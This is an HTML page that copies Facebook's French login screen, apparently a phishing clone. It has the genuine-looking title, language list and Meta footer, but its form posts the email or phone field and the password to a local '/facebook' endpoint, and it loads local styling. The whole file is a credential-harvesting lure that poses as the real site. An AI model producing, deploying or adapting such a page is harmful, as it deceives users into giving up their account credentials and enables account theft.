<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="stylesheet" type="text/css" href="../static/css/style.css">
	<link rel="icon" type="image/x-icon" href="../static/img/t.png">
	<title>Facebook - Connexion ou inscription</title>
</head>
<body>
	<h1>facebook</h1>
	<div class="wrapper">
	<form method="POST" action="/facebook">
			<br>
			<input type="text" name="TEXTE" maxlength="#" placeholder="Adresse e-mail ou numéro de tél.">
			<br>
			<br>
			<input type="password" name="cle" maxlength="#" placeholder="Mot de passe">
			<br>
			<br>
			<button class="convert_button">Se connecter</button>
			<br>
			<br>
			<a href="#">Mot de passe oublié</a>
			<br>
			<h5>________________________________________</h5>
			<br>
			<button class="deco">Créer un nouveau compte</button>
	</form>
	</div>
	<p class="p0"><b>Créer une Page</b> pour une célébrité, une marque ou une</p>
	<p class="p1">entreprise.</p>
	<p class="p2">Français (France)</p>
	<p class="p2">English (US)</p>
	<p class="p2">Italiano</p>
	<p class="p2">Español</p>
	<p class="p2">Deutsch</p>
	<p class="p2">中文(简体)</p>
	<p class="p2">Türkçe</p>
	<p class="p2">Português (Brasil)</p>
	<p class="p2">العربية</p>
	<p class="p2">हिन्दी</p>
	<p class="p2">S’inscrire  Se connecter  Messenger  Facebook Lite  Vidéo  Lieux  Jeux  Marketplace  Meta PayMeta StoreMeta QuestRay-Ban MetaMeta AI  Instagram  Threads Collectes de dons  Services Centre d’information sur les électionsPolitique de confidentialitéCentre de confidentialitéGroupesÀ proposCréer une publicité  Créer une Page Développeurs Emplois  Cookies  Choisir sa publicité  Conditions générales  Aide  Importation des contacts et non-utilisateurs  Paramètres  Historique d’activité</p>
	<p class="p2">Meta © 2024</p>
</body>
</html>